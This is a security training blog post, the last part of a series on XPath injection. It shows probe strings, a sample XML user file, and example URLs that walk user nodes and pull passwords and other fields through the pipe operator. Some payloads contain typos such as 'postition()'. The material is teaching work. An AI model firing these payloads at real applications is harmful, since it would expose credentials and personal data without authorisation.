Home 0P3N Blog Xpath Injection (Final)
Ready to Start Your Career?
Create Free Account
Multi Thinkers profile image
By: Multi Thinker
July 8, 2015

Xpath Injection (Final)

By: Multi Thinker
July 8, 2015
Multi Thinkers profile image
By: Multi Thinker
July 8, 2015
Xpath Injection (Final) - Cybrary1. Testing and confirming XpathiTesting for Xpath and confirming are the most important parts. Most of us, and specially the readers of securityidiots, see SQLi everywhere and anywhere they find an error - even if the error is a Conversional Error, Internal Error or Programming Error. Sometimes, people assume that getting blocked by WAF upon typing "Union Select" means it's vulnerable to SQLi.When we see an input field, the first thing we'll do is make it true using the below tests:
1 or 1=11 or true' or ''='" or ""="
In the case of Xpath or SQLi and many other Injections, they will work the same. To confirm if it's Xpathi, we can use the position() function, which is specific to Xpathi. Here are few tests we can try:
1 or postition()=1 or 1=11 or postition()=1 or true' or postition()=1 or ''='" or postition()=1 or ""="
If any of the above works, then you can assume that the injection you are dealing with is a Xpath Injection. Below is an example XML file, which we' ll be using throughout this tutorial: 
<xmlfile><users> <user>  <name first="example" last="example"/>  <id>1</id>  <username>Test</username>  <password>T</password>  <phone>123-456-7890</phone> </user> <user>  <name first="example" last="example"/>  <id>2</id>  <username>example</username>  <password>i_om-GAWWWD</password>  <phone>603-478-4115</phone> </user> <user>  <name first="example" last="example"/>  <id>3</id>  <username>example</username>  <password>ihavemoregfsthanyou</password>  <phone>222-222-2222</phone> </user> <user>  <name first="example" last="example"/>  <id>4</id>  <username>example</username>  <password>SelectPassFromDual</password>  <phone>88-777-8989</phone> </user></users></xmlfile>
Here are some basic Xpath queries, which can be used to extract data from the above file:
To Extract username where id=1/xmlfile/users/user[id='1']/usernameTo Extract username where id=2/xmlfile/users/user[id='2']/usernameTo Extract password where username is Monster/xmlfile/users/user[username="Monster"]/passwordTo Extract phone where username is Trojan and password is ihavemoregfsthanyou/xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phoneTo Extract the first username/xmlfile/users/user[position()=1]/username
Looking at all the above example queries, I believe it's clear enough to understand the basic way of extracting data using Xpath queries. 2. Iterating through the NodesLet's try injecting it with Xpath. Before we start injecting, let's assume the query that could be working inside. It should be something like "/root/semething/user[username="<Our_Intput_here>"]/phone" . Assuming this, let's try these injections:
http://example.net/challenge1/challenge_2.php?username='or''='And we got the number of first user, now to get the number of second user we ll use position() as i used before abovehttp://example.net/challenge1/challenge_2.php?username='or position()=2 and''='And we got the number of Second user, so on we can keep changing position() to get the rest of users phone numbers.http://example.net/challenge1/challenge_2.php?username='or position()=3 and''='And we got the number of Third user, so on we can keep changing position() to get the rest of users phone numbers.
We're done iterating through the nodes, but the problem is we aren't able to extract the other details like passwords etc., which should and must be saved in the same XML file. 3. Extracting Data from SiblingsUntil now, we were using position. We're able to enumerate through the nodes only, but /phone on the end is hard coded. We can't change it to extract other data. But fear not!! We have the Pipe operator, which works to combine two queries in Xpath. Here's how we can do this:
http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['The above Injection extracts the Second Element from first node.http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['The above Injection extracts the Third Element from first node.http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['The above Injection extracts the Forth Element from first node.http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['The above Injection extracts the Fifth Element from first node.http://example.net/challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['Here i changed the position which means it will extract data from the second node second element, so on you can keep changing and extracting.
Using this, we can extract data with zero knowledge of the internal file structure. Here's a Xpathi challenge you can try, solving the above method:[divider][one_half]Previous: Part 2[/one_half] Thanks for reading this series of posts!
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry